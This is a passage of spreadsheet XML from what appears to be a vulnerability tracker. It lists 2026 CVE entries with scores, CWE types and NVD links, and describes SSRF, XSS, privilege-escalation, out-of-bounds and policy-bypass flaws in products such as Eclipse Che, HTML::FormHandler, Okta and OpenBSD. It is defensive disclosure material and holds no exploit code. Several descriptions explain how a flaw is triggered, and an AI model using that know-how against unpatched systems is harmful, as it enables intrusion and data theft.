r="F1183" s="5" t="inlineStr"><is><t>emo@eclipse.org</t></is></c><c r="G1183" s="5" t="inlineStr" /><c r="H1183" s="5" t="n"><v>0.004</v></c><c r="I1183" s="5" t="inlineStr" /><c r="J1183" s="5" t="inlineStr"><is><t>kubernetes</t></is></c><c r="K1183" s="5" t="inlineStr" /><c r="L1183" s="5" t="inlineStr" /><c r="M1183" s="5" t="inlineStr" /><c r="N1183" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1183" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1183" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1183" s="5" t="inlineStr" /><c r="R1183" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S1183" s="5" t="inlineStr"><is><t>In Eclipse Che versions 7.79.0 through 7.121.0, the dashboard backend's POST /dashboard/api/data/resolver endpoint passes a caller-supplied URL directly to an outbound HTTP GET request with no host filtering. An authenticated user can exploit this server-side request forgery (SSRF) to read responses from internal network addresses, including the cloud instance metadata service (169.254.169.254), loopback interfaces, RFC-1918 private ranges, and in-cluster Kubernetes services. The operator-configured allowlist (spec.devEnvironments.allowedSources.urls) is not consulted. The vulnerability is fixed in version 7.122.0, which adds private-address blocking, IPv4-mapped IPv6 bypass prevention, operator allowlist enforcement, and disables HTTP redirects on the outbound request.</t></is></c><c r="T1183" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86590</t></is></c></row><row r="1184"><c r="A1184" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1184" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1184" s="5" t="inlineStr"><is><t>CVE-2026-18090</t></is></c><c r="D1184" s="5" t="n"><v>6.1</v></c><c r="E1184" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1184" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G1184" s="5" t="inlineStr" /><c r="H1184" s="5" t="n"><v>0.002</v></c><c r="I1184" s="5" t="inlineStr" /><c r="J1184" s="5" t="inlineStr" /><c r="K1184" s="5" t="inlineStr" /><c r="L1184" s="5" t="inlineStr" /><c r="M1184" s="5" t="inlineStr" /><c r="N1184" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1184" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1184" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1184" s="5" t="inlineStr" /><c r="R1184" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1184" s="5" t="inlineStr"><is><t>A flaw was found in gdk-pixbuf. This vulnerability allows a remote attacker to cause a heap out-of-bounds read by providing a specially crafted Apple Icon Image (.icns) file. The uncompress() function, which handles RLE-encoded ICNS icon data, fails to validate the source buffer's boundaries during decompression. This can lead to a denial of service, where the application crashes, or to information disclosure, potentially revealing sensitive data from adjacent memory.</t></is></c><c r="T1184" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18090</t></is></c></row><row r="1185"><c r="A1185" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1185" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1185" s="5" t="inlineStr"><is><t>CVE-2026-19872</t></is></c><c r="D1185" s="5" t="n"><v>6.1</v></c><c r="E1185" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1185" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1185" s="5" t="inlineStr" /><c r="H1185" s="5" t="n"><v>0.003</v></c><c r="I1185" s="5" t="inlineStr" /><c r="J1185" s="5" t="inlineStr" /><c r="K1185" s="5" t="inlineStr" /><c r="L1185" s="5" t="inlineStr" /><c r="M1185" s="5" t="inlineStr" /><c r="N1185" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1185" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1185" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1185" s="5" t="inlineStr" /><c r="R1185" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1185" s="5" t="inlineStr"><is><t>HTML::FormHandler versions before 0.410000 for Perl allow cross-site scripting via a submitted value rendered unescaped in an error message.

The wrappers and renderers that emit a form's errors interpolate the error string straight into HTML with no escaping. Two of the library's own messages, no_match and not_allowed, splice the submitted value into that string, and a failing type constraint puts the rejected value into the message it builds, which _apply_actions hands to add_error.

A field declared with a check regexp, a check list or a type constraint reaches those messages, with no custom validator and no non-default configuration. Errors rendered through an application's own escaping template layer rather than the library's rendering roles are not affected.

A request over the network that submits markup to such a field gets it back live inside the error span, running script in the victim's origin. Re-rendering a rejected value later gives the stored variant.</t></is></c><c r="T1185" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19872</t></is></c></row><row r="1186"><c r="A1186" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1186" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1186" s="5" t="inlineStr"><is><t>CVE-2026-63523</t></is></c><c r="D1186" s="5" t="n"><v>6.1</v></c><c r="E1186" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1186" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1186" s="5" t="inlineStr" /><c r="H1186" s="5" t="n"><v>0.007</v></c><c r="I1186" s="5" t="inlineStr" /><c r="J1186" s="5" t="inlineStr" /><c r="K1186" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L1186" s="5" t="inlineStr" /><c r="M1186" s="5" t="inlineStr" /><c r="N1186" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1186" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1186" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1186" s="5" t="inlineStr" /><c r="R1186" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1186" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') in Skype for Business allows an unauthorized attacker to perform spoofing over a network.</t></is></c><c r="T1186" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-63523</t></is></c></row><row r="1187"><c r="A1187" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1187" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1187" s="5" t="inlineStr"><is><t>CVE-2026-69642</t></is></c><c r="D1187" s="5" t="n"><v>6.1</v></c><c r="E1187" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1187" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1187" s="5" t="inlineStr" /><c r="H1187" s="5" t="n"><v>0.003</v></c><c r="I1187" s="5" t="inlineStr" /><c r="J1187" s="5" t="inlineStr" /><c r="K1187" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L1187" s="5" t="inlineStr" /><c r="M1187" s="5" t="inlineStr" /><c r="N1187" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1187" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1187" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1187" s="5" t="inlineStr" /><c r="R1187" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1187" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') in Skype for Business allows an unauthorized attacker to perform spoofing over a network.</t></is></c><c r="T1187" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69642</t></is></c></row><row r="1188"><c r="A1188" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1188" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1188" s="5" t="inlineStr"><is><t>CVE-2026-76002</t></is></c><c r="D1188" s="5" t="n"><v>6.1</v></c><c r="E1188" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1188" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1188" s="5" t="inlineStr" /><c r="H1188" s="5" t="n"><v>0.007</v></c><c r="I1188" s="5" t="inlineStr" /><c r="J1188" s="5" t="inlineStr" /><c r="K1188" s="5" t="inlineStr" /><c r="L1188" s="5" t="inlineStr" /><c r="M1188" s="5" t="inlineStr" /><c r="N1188" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1188" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1188" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1188" s="5" t="inlineStr" /><c r="R1188" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1188" s="5" t="inlineStr"><is><t>ColdFusion is affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. Scope is changed.</t></is></c><c r="T1188" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76002</t></is></c></row><row r="1189"><c r="A1189" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1189" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1189" s="5" t="inlineStr"><is><t>CVE-2026-77654</t></is></c><c r="D1189" s="5" t="n"><v>6.1</v></c><c r="E1189" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1189" s="5" t="inlineStr"><is><t>security.vulnerabilities@algosec.com</t></is></c><c r="G1189" s="5" t="inlineStr" /><c r="H1189" s="5" t="n"><v>0.001</v></c><c r="I1189" s="5" t="inlineStr" /><c r="J1189" s="5" t="inlineStr" /><c r="K1189" s="5" t="inlineStr" /><c r="L1189" s="5" t="inlineStr" /><c r="M1189" s="5" t="inlineStr" /><c r="N1189" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1189" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1189" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1189" s="5" t="inlineStr" /><c r="R1189" s="5" t="inlineStr"><is><t>CWE-266</t></is></c><c r="S1189" s="5" t="inlineStr"><is><t>Improper Privilege Management vulnerability in Horizon Security Analyzer (formerly AlgoSec Firewall Analyzer) on Linux, 64 bit allows Privilege Escalation and Parameter Injection.

A local user with access to the command line may escalate their privileges by abusing the parameters of a command that is approved in the sudoers file. 


This issue affects Horizon Security Analyzer : A33.10, A33.20 and A33.30.</t></is></c><c r="T1189" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77654</t></is></c></row><row r="1190"><c r="A1190" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1190" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1190" s="5" t="inlineStr"><is><t>CVE-2026-78738</t></is></c><c r="D1190" s="5" t="n"><v>6.1</v></c><c r="E1190" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1190" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1190" s="5" t="inlineStr" /><c r="H1190" s="5" t="n"><v>0.002</v></c><c r="I1190" s="5" t="inlineStr" /><c r="J1190" s="5" t="inlineStr" /><c r="K1190" s="5" t="inlineStr" /><c r="L1190" s="5" t="inlineStr" /><c r="M1190" s="5" t="inlineStr" /><c r="N1190" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1190" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1190" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1190" s="5" t="inlineStr" /><c r="R1190" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1190" s="5" t="inlineStr"><is><t>Silverpeas Core 6.4.6 is vulnerable to Cross Site Scripting (XSS) via the Document management file upload feature.</t></is></c><c r="T1190" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78738</t></is></c></row><row r="1191"><c r="A1191" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1191" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1191" s="5" t="inlineStr"><is><t>CVE-2026-78741</t></is></c><c r="D1191" s="5" t="n"><v>6.1</v></c><c r="E1191" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1191" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1191" s="5" t="inlineStr" /><c r="H1191" s="5" t="n"><v>0.002</v></c><c r="I1191" s="5" t="inlineStr" /><c r="J1191" s="5" t="inlineStr" /><c r="K1191" s="5" t="inlineStr" /><c r="L1191" s="5" t="inlineStr" /><c r="M1191" s="5" t="inlineStr" /><c r="N1191" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1191" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1191" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1191" s="5" t="inlineStr" /><c r="R1191" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1191" s="5" t="inlineStr"><is><t>Silverpeas Core &lt;=6.4.6 is vulnerable to Cross Site Scripting (XSS) in the wysiwyg-CKEditor image upload feature.</t></is></c><c r="T1191" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78741</t></is></c></row><row r="1192"><c r="A1192" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1192" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1192" s="5" t="inlineStr"><is><t>CVE-2026-78742</t></is></c><c r="D1192" s="5" t="n"><v>6.1</v></c><c r="E1192" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1192" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1192" s="5" t="inlineStr" /><c r="H1192" s="5" t="n"><v>0.002</v></c><c r="I1192" s="5" t="inlineStr" /><c r="J1192" s="5" t="inlineStr" /><c r="K1192" s="5" t="inlineStr" /><c r="L1192" s="5" t="inlineStr" /><c r="M1192" s="5" t="inlineStr" /><c r="N1192" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1192" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1192" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1192" s="5" t="inlineStr" /><c r="R1192" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1192" s="5" t="inlineStr"><is><t>Silverpeas Core &lt;=6.4.6 is vulnerable to Cross Site Scripting (XSS) via the Multimedia library application introduction.</t></is></c><c r="T1192" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78742</t></is></c></row><row r="1193"><c r="A1193" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1193" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1193" s="5" t="inlineStr"><is><t>CVE-2026-85484</t></is></c><c r="D1193" s="5" t="n"><v>6.1</v></c><c r="E1193" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1193" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1193" s="5" t="inlineStr" /><c r="H1193" s="5" t="n"><v>0.003</v></c><c r="I1193" s="5" t="inlineStr" /><c r="J1193" s="5" t="inlineStr" /><c r="K1193" s="5" t="inlineStr" /><c r="L1193" s="5" t="inlineStr" /><c r="M1193" s="5" t="inlineStr" /><c r="N1193" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1193" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1193" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1193" s="5" t="inlineStr" /><c r="R1193" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1193" s="5" t="inlineStr"><is><t>HTML::FormHandler versions before 0.410002 for Perl render option group labels and radio button labels into HTML without escaping.

The Select, RadioGroup, CheckboxGroup and HorizCheckboxGroup widgets render a group label unescaped, Select into a label attribute and the other three into element content. RadioGroup also renders each radio button's own label unescaped.

Any application whose option list is built from data rather than literals, using options_from, an options_fieldname method, or the DBIC model, allows attacker-influenced text in a label that can override the options or embed JavaScript in rendered pages.</t></is></c><c r="T1193" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85484</t></is></c></row><row r="1194"><c r="A1194" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1194" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1194" s="5" t="inlineStr"><is><t>CVE-2026-85485</t></is></c><c r="D1194" s="5" t="n"><v>6.1</v></c><c r="E1194" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1194" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1194" s="5" t="inlineStr" /><c r="H1194" s="5" t="n"><v>0.002</v></c><c r="I1194" s="5" t="inlineStr" /><c r="J1194" s="5" t="inlineStr" /><c r="K1194" s="5" t="inlineStr" /><c r="L1194" s="5" t="inlineStr" /><c r="M1194" s="5" t="inlineStr" /><c r="N1194" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1194" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1194" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1194" s="5" t="inlineStr" /><c r="R1194" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1194" s="5" t="inlineStr"><is><t>HTML::FormHandler versions before 0.410002 for Perl render some error messages into HTML without escaping.

The Table form layout and the Bootstrap 2 and 3 wrappers splice each error string straight into the surrounding markup. Version 0.410000, the fix for CVE-2026-19872, escaped the equivalent values in the other layouts and wrappers, and 0.410002 extended that to these three.

Error messages that contain attacker-influenced content such as rejected field values could embed JavaScript in rendered pages.</t></is></c><c r="T1194" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85485</t></is></c></row><row r="1195"><c r="A1195" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1195" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1195" s="5" t="inlineStr"><is><t>CVE-2026-85630</t></is></c><c r="D1195" s="5" t="n"><v>6.1</v></c><c r="E1195" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1195" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1195" s="5" t="inlineStr" /><c r="H1195" s="5" t="n"><v>0.003</v></c><c r="I1195" s="5" t="inlineStr" /><c r="J1195" s="5" t="inlineStr" /><c r="K1195" s="5" t="inlineStr" /><c r="L1195" s="5" t="inlineStr" /><c r="M1195" s="5" t="inlineStr" /><c r="N1195" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1195" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1195" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1195" s="5" t="inlineStr" /><c r="R1195" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1195" s="5" t="inlineStr"><is><t>HTML::FormHandler versions before 0.410002 for Perl render field attributes into HTML without escaping using the process_attrs method.

Any application with fields or field labels where some attributes are built from data rather than literals allows attacker-influenced text in an attribute value that can override the field attributes or embed JavaScript in rendered pages.

For example, the RadioGroup widget uses the process_attrs method via the render_option and wrap_radio methods.</t></is></c><c r="T1195" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85630</t></is></c></row><row r="1196"><c r="A1196" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1196" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1196" s="5" t="inlineStr"><is><t>CVE-2026-56101</t></is></c><c r="D1196" s="5" t="n"><v>6</v></c><c r="E1196" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1196" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1196" s="5" t="inlineStr" /><c r="H1196" s="5" t="n"><v>0.004</v></c><c r="I1196" s="5" t="inlineStr" /><c r="J1196" s="5" t="inlineStr" /><c r="K1196" s="5" t="inlineStr" /><c r="L1196" s="5" t="inlineStr" /><c r="M1196" s="5" t="inlineStr" /><c r="N1196" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1196" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1196" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1196" s="5" t="inlineStr" /><c r="R1196" s="5" t="inlineStr"><is><t>CWE-697</t></is></c><c r="S1196" s="5" t="inlineStr"><is><t>OpenBSD before commit 1ee99df contains an inverted comparison vulnerability in the ieee80211_michael_mic_failure() function within sys/net80211/ieee80211_crypto_tkip.c that allows unauthenticated attackers within RF range to trigger denial of service by sending two malformed TKIP frames separated by more than 60 seconds. Attackers can exploit the reversed TKIP MIC failure countermeasure window check to deauthenticate all associated TKIP stations and block reassociation for up to 90 seconds, while within-window MIC failures that should engage countermeasures are silently discarded, leaving key-recovery attempts undetected.</t></is></c><c r="T1196" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-56101</t></is></c></row><row r="1197"><c r="A1197" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1197" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1197" s="5" t="inlineStr"><is><t>CVE-2026-78216</t></is></c><c r="D1197" s="5" t="n"><v>6</v></c><c r="E1197" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1197" s="5" t="inlineStr"><is><t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t></is></c><c r="G1197" s="5" t="inlineStr" /><c r="H1197" s="5" t="n"><v>0.002</v></c><c r="I1197" s="5" t="inlineStr" /><c r="J1197" s="5" t="inlineStr" /><c r="K1197" s="5" t="inlineStr" /><c r="L1197" s="5" t="inlineStr" /><c r="M1197" s="5" t="inlineStr" /><c r="N1197" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1197" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1197" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1197" s="5" t="inlineStr" /><c r="R1197" s="5" t="inlineStr"><is><t>CWE-1220</t></is></c><c r="S1197" s="5" t="inlineStr"><is><t>AshLua exposes Ash read actions to Lua scripts run through an eval action. A read call accepts an operation (list, min, max, first, sum, avg) that builds an ad-hoc Ash.Query.Aggregate over a named field and returns its raw value.

Ash field policies redact forbidden fields on returned records (replacing them with %Ash.ForbiddenField{}), but that redaction does not apply to aggregate values. A script could therefore read a field the calling actor's field policies forbid by requesting it as an aggregate instead of as a field. This includes fields that are public? true but restricted per-actor by a field policy, such as sensitive PII. The prior hardening only enforced the exposed-field allow-list (field visibility), which is a separate axis from per-actor field-policy authorization.

The fix authorizes the aggregated field against the resource's field policies, so aggregating over a field the actor may not see is refused or scoped to the rows where it is visible.

This issue affects ash_lua: from 0.1.0 before 0.2.2.</t></is></c><c r="T1197" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78216</t></is></c></row><row r="1198"><c r="A1198" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1198" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1198" s="5" t="inlineStr"><is><t>CVE-2026-78230</t></is></c><c r="D1198" s="5" t="n"><v>6</v></c><c r="E1198" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1198" s="5" t="inlineStr"><is><t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t></is></c><c r="G1198" s="5" t="inlineStr" /><c r="H1198" s="5" t="n"><v>0.002</v></c><c r="I1198" s="5" t="inlineStr" /><c r="J1198" s="5" t="inlineStr" /><c r="K1198" s="5" t="inlineStr" /><c r="L1198" s="5" t="inlineStr" /><c r="M1198" s="5" t="inlineStr" /><c r="N1198" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1198" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1198" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1198" s="5" t="inlineStr" /><c r="R1198" s="5" t="inlineStr"><is><t>CWE-1220</t></is></c><c r="S1198" s="5" t="inlineStr"><is><t>AshAi exposes Ash read actions to language-model tool calls. The read tool accepts an aggregate result type (min, max, sum, avg) that builds an ad-hoc Ash.Query.Aggregate over a named field and returns its raw value.

Ash field policies redact forbidden fields on returned records (replacing them with %Ash.ForbiddenField{}), but that redaction does not apply to aggregate values. A tool caller could therefore read a field the calling actor's field policies forbid by requesting it as an aggregate; min/max in particular return an actual field value. This includes fields that are public? true but restricted per-actor by a field policy, such as sensitive PII. The tool's existing check only required the field to be public, which is a separate axis from per-actor field-policy authorization.

The fix authorizes the aggregated field against the resource's field policies, so aggregating over a field the actor may not see is refused or scoped to the rows where it is visible.

This issue affects ash_ai: from 0.1.0 before 1.0.3.</t></is></c><c r="T1198" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78230</t></is></c></row><row r="1199"><c r="A1199" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1199" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1199" s="5" t="inlineStr"><is><t>CVE-2026-78552</t></is></c><c r="D1199" s="5" t="n"><v>6</v></c><c r="E1199" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1199" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1199" s="5" t="inlineStr" /><c r="H1199" s="5" t="n"><v>0.003</v></c><c r="I1199" s="5" t="inlineStr" /><c r="J1199" s="5" t="inlineStr"><is><t>nginx, okta</t></is></c><c r="K1199" s="5" t="inlineStr" /><c r="L1199" s="5" t="inlineStr" /><c r="M1199" s="5" t="inlineStr" /><c r="N1199" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1199" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1199" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1199" s="5" t="inlineStr" /><c r="R1199" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S1199" s="5" t="inlineStr"><is><t>The Okta Access Gateway does not apply its Lua directive restriction to the application-level custom configuration field. The field is interpolated directly into the nginx server block without inspection, resulting in execution of injected directives.</t></is></c><c r="T1199" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78552</t></is></c></row><row r="1200"><c r="A1200" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1200" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1200" s="5" t="inlineStr"><is><t>CVE-2026-78622</t></is></c><c r="D1200" s="5" t="n"><v>6</v></c><c r="E1200" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1200" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1200" s="5" t="inlineStr" /><c r="H1200" s="5" t="n"><v>0.001</v></c><c r="I1200" s="5" t="inlineStr" /><c r="J1200" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1200" s="5" t="inlineStr" /><c r="L1200" s="5" t="inlineStr" /><c r="M1200" s="5" t="inlineStr" /><c r="N1200" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1200" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1200" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1200" s="5" t="inlineStr" /><c r="R1200" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="S1200" s="5" t="inlineStr"><is><t>The Okta Verify for Windows uninstaller does not verify whether the user data directory is a filesystem junction before deleting its contents with elevated privileges. The delete operation follows the junction target, resulting in recursive deletion of unintended directory contents.</t></is></c><c r="T1200" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78622</t></is></c></row><row r="1201"><c r="A1201" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1201" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1201" s="5" t="inlineStr"><is><t>CVE-2026-82056</t></is></c><c r="D1201" s="5" t="n"><v>6</v></c><c r="E1201" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1201" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G1201" s="5" t="inlineStr" /><c r="H1201" s="5" t="n"><v>0.002</v></c><c r="I1201" s="5" t="inlineStr" /><c r="J1201" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1201" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1201" s="5" t="inlineStr" /><c r="M1201" s="5" t="inlineStr" /><c r="N1201" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1201" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1201" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1201" s="5" t="inlineStr" /><c r="R1201" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1201" s="5" t="inlineStr"><is><t>A race condition in MongoDB server's text index query parsing can cause a heap use-after-free read when handling upsert retry paths. Under certain concurrent index lifecycle operations, a raw pointer to internal text index metadata may be dereferenced after the underlying structures have been freed, leading to a 